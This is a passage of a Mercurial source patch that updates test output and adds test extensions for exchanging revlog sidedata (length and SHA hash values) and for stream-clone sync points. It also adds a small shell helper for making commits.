received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) @@ -1196,7 +1197,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) diff --git a/tests/testlib/common.sh b/tests/testlib/common.sh new file mode 100644 --- /dev/null +++ b/tests/testlib/common.sh @@ -0,0 +1,7 @@ +mkcommit() { + name="$1" + shift + echo "$name" > "$name" + hg add "$name" + hg ci -m "$name" "$@" +} diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-2.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-2.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-2.py @@ -1,6 +1,9 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-2.py - small extension to test (differently) the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a 
complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,78 +13,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - -from mercurial.revlogutils import sidedata +from mercurial.revlogutils import sidedata as sidedatamod -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = 
struct.pack('>32s', sha256) + return sidedata -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. + for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-3.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-3.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-3.py @@ -1,6 +1,10 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-3.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a client for a complex sidedata exchange. 
+# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -10,19 +14,38 @@ import hashlib import struct -from mercurial.node import ( - nullid, - nullrev, -) from mercurial import ( extensions, - requirements, revlog, ) -from mercurial.upgrade_utils import engine as upgrade_engine +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + -from mercurial.revlogutils import sidedata +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def compute_sidedata_3(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha384 = hashlib.sha384(text).digest() + sidedata[sidedatamod.SD_TEST3] = struct.pack('>48s', sha384) + return sidedata def wrapaddrevision( @@ -31,57 +54,35 @@ if kwargs.get('sidedata') is None: kwargs['sidedata'] = {} sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) + sd = compute_sidedata_1(None, self, None, sd, text=text) + kwargs['sidedata'] = compute_sidedata_2(None, self, None, sd, text=text) return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', 
False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return False, (), update, 0, 0 - - return sidedatacompanion - - def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. 
+ for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST3, + (sidedatamod.SD_TEST3,), + compute_sidedata_3, + ) + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata-4.py copy from tests/testlib/ext-sidedata.py copy to tests/testlib/ext-sidedata-4.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata-4.py @@ -1,87 +1,19 @@ -# ext-sidedata.py - small extension to test the sidedata logic +# coding: utf8 +# ext-sidedata-4.py - small extension to test (differently still) the sidedata +# logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Simulates a server for a complex sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
from __future__ import absolute_import -import hashlib -import struct - -from mercurial.node import ( - nullid, - nullrev, -) -from mercurial import ( - extensions, - requirements, - revlog, -) - -from mercurial.upgrade_utils import engine as upgrade_engine - from mercurial.revlogutils import sidedata -def wrapaddrevision( - orig, self, text, transaction, link, p1, p2, *args, **kwargs -): - if kwargs.get('sidedata') is None: - kwargs['sidedata'] = {} - sd = kwargs['sidedata'] - ## let's store some arbitrary data just for testing - # text length - sd[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - sd[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - return orig(self, text, transaction, link, p1, p2, *args, **kwargs) - - -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) - if getattr(self, 'sidedatanocheck', False): - return text - if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: - raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] - got = hashlib.sha256(text).digest() - if got != expected: - raise RuntimeError('sha256 mismatch') - return text - - -def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): - sidedatacompanion = orig(srcrepo, dstrepo) - addedreqs = dstrepo.requirements - srcrepo.requirements - if requirements.SIDEDATA_REQUIREMENT in addedreqs: - assert sidedatacompanion is None # deal with composition later - - def sidedatacompanion(revlog, rev): - update = {} - revlog.sidedatanocheck = True - try: - text = revlog.revision(rev) - finally: - del revlog.sidedatanocheck - ## let's store some arbitrary data just for testing - # text length - update[sidedata.SD_TEST1] = struct.pack('>I', len(text)) - # and sha2 hashes - sha256 = hashlib.sha256(text).digest() - update[sidedata.SD_TEST2] = struct.pack('>32s', sha256) - 
return False, (), update, 0, 0 - - return sidedatacompanion - - -def extsetup(ui): - extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) - extensions.wrapfunction( - upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion - ) +def reposetup(ui, repo): + repo.register_wanted_sidedata(sidedata.SD_TEST2) + repo.register_wanted_sidedata(sidedata.SD_TEST3) diff --git a/tests/testlib/ext-sidedata-5.py b/tests/testlib/ext-sidedata-5.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-sidedata-5.py @@ -0,0 +1,81 @@ +# coding: utf8 +# ext-sidedata-5.py - small extension to test (differently still) the sidedata +# logic +# +# Simulates a server for a simple sidedata exchange. +# +# Copyright 2021 Raphaël Gomès <rgomes@octobus.net> +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. + +from __future__ import absolute_import + +import hashlib +import struct + +from mercurial import ( + extensions, + revlog, +) + + +from mercurial.revlogutils import sidedata as sidedatamod + + +def compute_sidedata_1(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sidedata[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + return sidedata + + +def compute_sidedata_2(repo, revlog, rev, sidedata, text=None): + sidedata = sidedata.copy() + if text is None: + text = revlog.revision(rev) + sha256 = hashlib.sha256(text).digest() + sidedata[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return sidedata + + +def reposetup(ui, repo): + # Sidedata keys happen to be the same as the categories, easier for testing. 
+ for kind in (b'changelog', b'manifest', b'filelog'): + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST1, + (sidedatamod.SD_TEST1,), + compute_sidedata_1, + ) + repo.register_sidedata_computer( + kind, + sidedatamod.SD_TEST2, + (sidedatamod.SD_TEST2,), + compute_sidedata_2, + ) + + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedatamod.SD_TEST1) + repo.register_wanted_sidedata(sidedatamod.SD_TEST2) + + +def wrapaddrevision( + orig, self, text, transaction, link, p1, p2, *args, **kwargs +): + if kwargs.get('sidedata') is None: + kwargs['sidedata'] = {} + sd = kwargs['sidedata'] + ## let's store some arbitrary data just for testing + # text length + sd[sidedatamod.SD_TEST1] = struct.pack('>I', len(text)) + # and sha2 hashes + sha256 = hashlib.sha256(text).digest() + sd[sidedatamod.SD_TEST2] = struct.pack('>32s', sha256) + return orig(self, text, transaction, link, p1, p2, *args, **kwargs) + + +def extsetup(ui): + extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) diff --git a/tests/testlib/ext-sidedata.py b/tests/testlib/ext-sidedata.py --- a/tests/testlib/ext-sidedata.py +++ b/tests/testlib/ext-sidedata.py @@ -1,6 +1,6 @@ # ext-sidedata.py - small extension to test the sidedata logic # -# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net) +# Copyright 2019 Pierre-Yves David <pierre-yves.david@octobus.net> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. 
@@ -40,19 +40,21 @@ return orig(self, text, transaction, link, p1, p2, *args, **kwargs) -def wraprevision(orig, self, nodeorrev, *args, **kwargs): - text = orig(self, nodeorrev, *args, **kwargs) +def wrap_revisiondata(orig, self, nodeorrev, *args, **kwargs): + text, sd = orig(self, nodeorrev, *args, **kwargs) if getattr(self, 'sidedatanocheck', False): - return text + return text, sd + if self.version & 0xFFFF != 2: + return text, sd if nodeorrev != nullrev and nodeorrev != nullid: - sd = self.sidedata(nodeorrev) - if len(text) != struct.unpack('>I', sd[sidedata.SD_TEST1])[0]: + cat1 = sd.get(sidedata.SD_TEST1) + if cat1 is not None and len(text) != struct.unpack('>I', cat1)[0]: raise RuntimeError('text size mismatch') - expected = sd[sidedata.SD_TEST2] + expected = sd.get(sidedata.SD_TEST2) got = hashlib.sha256(text).digest() - if got != expected: + if expected is not None and got != expected: raise RuntimeError('sha256 mismatch') - return text + return text, sd def wrapgetsidedatacompanion(orig, srcrepo, dstrepo): @@ -81,7 +83,14 @@ def extsetup(ui): extensions.wrapfunction(revlog.revlog, 'addrevision', wrapaddrevision) - extensions.wrapfunction(revlog.revlog, 'revision', wraprevision) + extensions.wrapfunction(revlog.revlog, '_revisiondata', wrap_revisiondata) extensions.wrapfunction( upgrade_engine, 'getsidedatacompanion', wrapgetsidedatacompanion ) + + +def reposetup(ui, repo): + # We don't register sidedata computers because we don't care within these + # tests + repo.register_wanted_sidedata(sidedata.SD_TEST1) + repo.register_wanted_sidedata(sidedata.SD_TEST2) diff --git a/tests/testlib/ext-stream-clone-steps.py b/tests/testlib/ext-stream-clone-steps.py new file mode 100644 --- /dev/null +++ b/tests/testlib/ext-stream-clone-steps.py @@ -0,0 +1,31 @@ +from __future__ import absolute_import + +from mercurial import ( + encoding, + extensions, + streamclone, + testing, +) + + +WALKED_FILE_1 = encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_1'] +WALKED_FILE_2 = 
encoding.environ[b'HG_TEST_STREAM_WALKED_FILE_2'] + + +def _test_sync_point_walk_1(orig, repo): + testing.write_file(WALKED_FILE_1) + + +def _test_sync_point_walk_2(orig, repo): + assert repo._currentlock(repo._lockref) is None + testing.wait_file(WALKED_FILE_2) + + +def uisetup(ui): + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_1', _test_sync_point_walk_1 + ) + + extensions.wrapfunction( + streamclone, '_test_sync_point_walk_2', _test_sync_point_walk_2 + )